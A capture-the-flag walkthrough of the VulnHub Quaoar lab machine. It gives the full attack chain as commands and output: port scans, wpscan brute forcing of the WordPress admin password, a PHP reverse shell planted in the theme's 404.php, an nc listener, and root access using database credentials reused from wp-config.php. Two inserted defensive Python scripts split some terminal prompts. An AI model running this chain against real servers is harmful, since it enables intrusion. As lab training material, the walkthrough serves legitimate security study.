Quaoar
Target machine: http://www.vulnhub.com/entry/hackfest2016-quaoar,180/
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Quaoar]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.65.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:6b:e4:21 1 60 PCS Systemtechnik GmbH
192.168.56.138 08:00:27:2c:ce:d0 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool that ships with Kali Linux, the target host's IP address is identified as 192.168.56.138.
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/Quaoar]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.138 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-28 09:08 EDT
Nmap scan report for bogon (192.168.56.138)
Host is up (0.00013s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA)
| 2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA)
|_ 256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA)
53/tcp open domain ISC BIND 9.8.1-P1
| dns-nsid:
|_ bind.version: 9.8.1-P1
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_Hackers
110/tcp open pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after: 2026-10-07T04:32:43
|_ssl-date: 2022-10-28T21:08:34+00:00; +8h00m00s from scanner time.
|_pop3-capabilities: UIDL SASL TOP STLS RESP-CODES CAPA PIPELINING
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after: 2026-10-07T04:32:43
|_ssl-date: 2022-10-28T21:08:33+00:00; +8h00m00s from scanner time.
|_imap-capabilities: ENABLE ID IMAP4rev1 listed capabilities have LITERAL+ post-login Pre-login STARTTLS LOGIN-REFERRALS IDLE LOGINDISABLEDA0001 OK SASL-IR more
445/tcp open netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd
|_ssl-date: 2022-10-28T21:08:33+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after: 2026-10-07T04:32:43
|_imap-capabilities: ENABLE IMAP4rev1 listed capabilities AUTH=PLAINA0001 LITERAL+ have post-login ID LOGIN-REFERRALS IDLE OK Pre-login SASL-IR more
995/tcp open ssl/pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after: 2026-10-07T04:32:43
|_ssl-date: 2022-10-28T21:08:33+00:00; +7h59m59s from scanner time.
|_pop3-capabilities: UIDL SASL(PLAIN) TOP USER RESP-CODES CAPA PIPELINING
MAC Address: 08:00:27:2C:CE:D0 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 8h39m59s, deviation: 1h37m58s, median: 7h59m58s
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: QUAOAR, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Unix (Samba 3.6.3)
| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2022-10-28T17:08:24-04:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.09 seconds
The target host has quite a few open ports. Each open port is examined in turn in order to obtain a shell on the target, i.e. Gain Access.
Gain Access
└─$ searchsploit openssh 5.9
------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------- ---------------------------------
OpenSSH 2.3 < 7.7 - Username Enumeration | linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration ( | linux/remote/45210.py
OpenSSH < 6.6 SFTP (x64) - Command Executi | linux_x86-64/remote/45000.c
OpenSSH < 6.6 SFTP - Command Execution | linux/remote/45001.py
OpenSSH < 7.4 - 'UsePrivilegeSeparation Di | linux/local/40962.txt
OpenSSH < 7.4 - agent Protocol Arbitrary L | linux/remote/40963.txt
OpenSSH < 7.7 - User Enumeration (2) | linux/remote/45939.py
------------------------------------------- ---------------------------------
Shellcodes: No Results
Although the OpenSSH version looks fairly old, a searchsploit query turns up no exploitable vulnerability for it.
The DNS service is skipped for now.
Browsing to the target host with a web browser reveals a link pointing to an image; download it locally.
┌──(kali㉿kali)-[~/Vulnhub/Quaoar]
└─$ steghide extract -sf Hack_The_Planet.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Vulnhub/Quaoar]
└─$ stegseek Hack_The_Planet.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.28% (132.5 MB)
[!] error: Could not find a valid passphrase.
Cracking the image's passphrase failed, so other avenues have to be tried.
Check whether the target's web site has a robots.txt file; this file tells us directly that the target hosts a WordPress site.
┌──(kali㉿kali)-[~/Vulnhub/Quaoar]
└─$ curl http://192.168.56.138/robots.txt
Disallow: Hackers
Allow: /wordpress/
The /wordpress directory was discovered.
Since this is a WordPress site, wpscan is the obvious tool; see whether it can enumerate usernames and vulnerable plugins.
┌──(kali㉿kali)-[~/Vulnhub/Quaoar]
└─$ wpscan --url http://192.168.56.138/wordpress/ -e u,ap
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://192.168.56.138/wordpress/ [192.168.56.138]
[+] Started: Fri Oct 28 23:11:57 2022
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.2.22 (Ubuntu)
| - X-Powered-By: PHP/5.3.10-1ubuntu3
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.138/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.138/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.138/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.138/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 3.9.14 identified (Insecure, released on 2016-09-07).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.56.138/wordpress/?feed=rss2, <generator>http://wordpress.org/?v=3.9.14</generator>
| - http://192.168.56.138/wordpress/?feed=comments-rss2, <generator>http://wordpress.org/?v=3.9.14</generator>
[+] WordPress theme in use: twentyfourteen
| Location: http://192.168.56.138/wordpress/wp-content/themes/twentyfourteen/
| Last Updated: 2022-05-24T00:00:00.000Z
| [!] The version is out of date, the latest version is 3.4
| Style URL: http://192.168.56.138/wordpress/wp-content/themes/twentyfourteen/style.css?ver=3.9.14
| Style Name: Twenty Fourteen
| Style URI: http://wordpress.org/themes/twentyfourteen
| Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern design...
| Author: the WordPress team
| Author URI: http://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.56.138/wordpress/wp-content/themes/twentyfourteen/style.css?ver=3.9.14, Match: 'Version: 1.1'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] mail-masta
| Location: http://192.168.56.138/wordpress/wp-content/plugins/mail-masta/
| Latest Version: 1.0 (up to date)
| Last Updated: 2014-09-19T07:52:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.138/wordpress/wp-content/plugins/mail-masta/readme.txt
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] wpuser
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Oct 28 23:12:01 2022
[+] Requests Done: 77
[+] Cached Requests: 6
[+] Data Sent: 19.364 KB
[+] Data Received: 19.369 MB
[+] Memory used: 235.52 MB
[+] Elapsed time: 00:00:04
The WordPress usernames admin and wpuser were successfully discovered; now see whether the administrator admin's password can be cracked:
┌──(kali㉿kali)-[~/Vulnhub/Quaoar]
└─$ wpscan --url http://192.168.56.138/wordpress/ -U admin -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.56.138/wordpress/ [192.168.56.138]
[+] Started: Fri Oct 28 23:13:42 2022
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.2.22 (Ubuntu)
| - X-Powered-By: PHP/5.3.10-1ubuntu3
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.138/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.138/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.138/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.138/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 3.9.14 identified (Insecure, released on 2016-09-07).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.56.138/wordpress/?feed=rss2, <generator>http://wordpress.org/?v=3.9.14</generator>
| - http://192.168.56.138/wordpress/?feed=comments-rss2, <generator>http://wordpress.org/?v=3.9.14</generator>
[+] WordPress theme in use: twentyfourteen
| Location: http://192.168.56.138/wordpress/wp-content/themes/twentyfourteen/
| Last Updated: 2022-05-24T00:00:00.000Z
| [!] The version is out of date, the latest version is 3.4
| Style URL: http://192.168.56.138/wordpress/wp-content/themes/twentyfourteen/style.css?ver=3.9.14
| Style Name: Twenty Fourteen
| Style URI: http://wordpress.org/themes/twentyfourteen
| Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern design...
| Author: the WordPress team
| Author URI: http://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.56.138/wordpress/wp-content/themes/twentyfourteen/style.css?ver=3.9.14, Match: 'Version: 1.1'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] mail-masta
| Location: http://192.168.56.138/wordpress/wp-content/plugins/mail-masta/
| Latest Version: 1.0 (up to date)
| Last Updated: 2014-09-19T07:52:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.138/wordpress/wp-content/plugins/mail-masta/readme.txt
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <> (105 / 137) 76.64% ETA: 00:00:0 Checking Config Backups - Time: 00:00:00 <> (120 / 137) 87.59% ETA: 00:00:0 Checking Config Backups - Time: 00:00:00 <> (136 / 137) 99.27% ETA: 00:00:0 Checking Config Backups - Time: 00:00:00 <> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc Multicall against 1 user/s
[SUCCESS] - admin / admin
All Found
Progress Time: 00:01:01 < > (40 / 28688) 0.13% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: admin, Password: admin
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Oct 28 23:14:48 2022
[+] Requests Done: 183
[+] Cached Requests: 41
[+] Data Sent: 52.911 KB
[+] Data Received: 4.132 MB
[+] Memory used: 317.59 MB
[+] Elapsed time: 00:01:06
Successfully cracked admin's password: admin
Log in to the WordPress admin backend with the cracked username and password and see whether a PHP reverse shell file can be uploaded (download a PHP reverse shell script from the Internet and change the callback address and port):
┌──(kali㉿kali)-[~/Vulnhub/Quaoar]
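The password attack above went through XML-RPC `system.multicall`, which packs many login guesses into one POST to xmlrpc.php, so a handful of requests can represent thousands of attempts. As an added example (not code from the original write-up), this Python script flags clients that POST to xmlrpc.php repeatedly within a sliding time window; the Apache combined-format log lines, IPs, timestamps and User-Agent strings are constructed for the demo.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache "combined" log format; the timestamp looks like 28/Oct/2022:23:13:42 +0000.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample: 12 POSTs to xmlrpc.php from one client within 11 seconds
# (the shape a multicall password attack leaves behind), plus ordinary traffic.
SAMPLE_LOG = [
    f'192.168.56.137 - - [28/Oct/2022:23:13:{s:02d} +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" '
    '200 1024 "-" "WPScan v3.8.22"'
    for s in range(42, 54)
] + [
    '192.168.56.1 - - [28/Oct/2022:23:13:45 +0000] "GET /wordpress/ HTTP/1.1" 200 7321 "-" "Mozilla/5.0"',
    '192.168.56.1 - - [28/Oct/2022:23:14:02 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 512 "-" "WordPress/3.9.14"',
]

def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))

def xmlrpc_bursts(lines, window_seconds=60, threshold=10):
    """Map client IP -> peak number of POSTs to xmlrpc.php inside any sliding window,
    keeping only clients at or above threshold. Lines are assumed to be in log order."""
    recent = defaultdict(deque)
    peak = defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, _status = rec
        if method != "POST" or not path.endswith("/xmlrpc.php"):
            continue
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()
        peak[ip] = max(peak[ip], len(q))
    return {ip: n for ip, n in peak.items() if n >= threshold}

if __name__ == "__main__":
    for ip, n in xmlrpc_bursts(SAMPLE_LOG).items():
        print(f"{ip}: {n} POSTs to xmlrpc.php within 60s, likely multicall password attack")
```

Because one multicall request already carries many guesses, the threshold should be low; removing `system.multicall` through the WordPress `xmlrpc_methods` filter, or blocking xmlrpc.php at the web server, closes this vector entirely.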
└─$ cp ~/Tools/php_reverse_shell/php-reverse-shell-1.0/php-reverse-shell.php .
┌──(kali㉿kali)-[~/Vulnhub/Quaoar]
└─$ ls
Hack_The_Planet.jpg nmap_full_scan php-reverse-shell.php
┌──(kali㉿kali)-[~/Vulnhub/Quaoar]
└─$ mv php-reverse-shell.php shell.php
┌──(kali㉿kali)-[~/Vulnhub/Quaoar]
└─$ vim shell.php
First try the PHP shell upload point: Media.
The upload is rejected, so some kind of filtering is in place; look at the other upload points:
Try Appearance -> Editor -> Templates and modify the 404 template:
The page was modified successfully; visiting the 404 page (http://192.168.56.138/wordpress/wp-content/themes/twentyfourteen/404.php) then yields a shell.
┌──(kali㉿kali)-[~/Vulnhub/Quaoar]
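The foothold came from editing the theme's 404.php through Appearance -> Editor, which WordPress allows any administrator to do unless `define('DISALLOW_FILE_EDIT', true);` is set in wp-config.php. As an added example (not code from the write-up), this Python script snapshots a theme directory's SHA-256 hashes and reports which files changed, and includes a quick check for the DISALLOW_FILE_EDIT constant; the theme directory, its file contents and the edit are constructed in a temporary directory.

```python
import hashlib
import os
import re
import tempfile

def hash_tree(root):
    """Map each file under root (path relative to root) to its SHA-256 hex digest."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as f:
                digests[os.path.relpath(full, root)] = hashlib.sha256(f.read()).hexdigest()
    return digests

def diff_manifest(baseline, current):
    """Compare two hash_tree() results; return (modified, added, removed) relative paths."""
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    return modified, added, removed

# Matches define('DISALLOW_FILE_EDIT', true); with either quote style and any spacing.
# A commented-out define would also match; this is a quick check, not a PHP parser.
FILE_EDIT_RE = re.compile(r"""define\(\s*['"]DISALLOW_FILE_EDIT['"]\s*,\s*true\s*\)""", re.I)

def file_edit_disabled(wp_config_text):
    """True if wp-config.php turns off the dashboard theme/plugin editor."""
    return FILE_EDIT_RE.search(wp_config_text) is not None

def demo():
    """Constructed scenario: snapshot a fake theme directory, then alter 404.php
    the way the theme editor does on disk, and return what the comparison catches."""
    with tempfile.TemporaryDirectory() as theme:
        for name, body in {"404.php": "<?php get_header(); ?>\n",
                           "style.css": "/* Twenty Fourteen */\n"}.items():
            with open(os.path.join(theme, name), "w") as f:
                f.write(body)
        baseline = hash_tree(theme)  # would normally be taken right after installation
        with open(os.path.join(theme, "404.php"), "a") as f:
            f.write("<?php /* edited via Appearance > Editor */ ?>\n")
        return diff_manifest(baseline, hash_tree(theme))

if __name__ == "__main__":
    print(demo())  # (['404.php'], [], [])
    print(file_edit_disabled("define('DISALLOW_FILE_EDIT', true);"))  # True
```

In practice the baseline manifest is stored off-host and the comparison runs from cron, since an attacker who can edit theme files can also edit a manifest kept next to them.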
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.138] 34393
Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 i686 i386 GNU/Linux
07:46:18 up 1:13, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")
> '
www-data@Quaoar:/$
www-data@Quaoar:/$ cd /home/wpadmin
cd /home/wpadmin
www-data@Quaoar:/home/wpadmin$ ls -alh
ls -alh
total 12K
drwxr-xr-x 2 root root 4.0K Oct 22 2016 .
drwxr-xr-x 3 root root 4.0K Oct 24 2016 ..
-rw-r--r-- 1 wpadmin wpadmin 33 Oct 22 2016 flag.txt
www-data@Quaoar:/home/wpadmin$ cat flag.txt
cat flag.txt
2bafe61f03117ac66a73c3c514de796e
www-data@Quaoar:/home/wpadmin$
Root privilege escalation
The wordpress directory on the target host contains a wp-config.php file that holds the root username and password:
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');
Although these are database credentials, it is worth checking whether they are also the operating system's username and password.
www-data@Quaoar:/var/www/wordpress$ su - root
su - root
Password: rootpassword!
root@Quaoar:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@Quaoar:~# ls -alh
ls -alh
total 48K
drwx------ 6 root root 4.0K Nov 30 2016 .
drwxr-xr-x 22 root root 4.0K Oct 7 2016 ..
drwx------ 2 root root 4.0K Oct 7 2016 .aptitude
-rw------- 1 root root 368 Jan 15 2017 .bash_history
-rw-r--r-- 1 root root 3.1K Apr 19 2012 .bashrc
drwx------ 2 root root 4.0K Oct 15 2016 .cache
---------- 1 root root 33 Oct 22 2016 flag.txt
-rw-r--r-- 1 root root 140 Apr 19 2012 .profile
drwx------ 2 root root 4.0K Oct 26 2016 .ssh
-rw------- 1 root root 4.7K Nov 30 2016 .viminfo
drwxr-xr-x 8 root root 4.0K Jan 29 2015 vmware-tools-distrib
root@Quaoar:~# cat flag.txt
cat flag.txt
8e3f9ec016e3598c5eec11fd3d73f6fb
Successfully obtained root.
Source: https://www.cnblogs.com/jason-huawen/p/16838451.html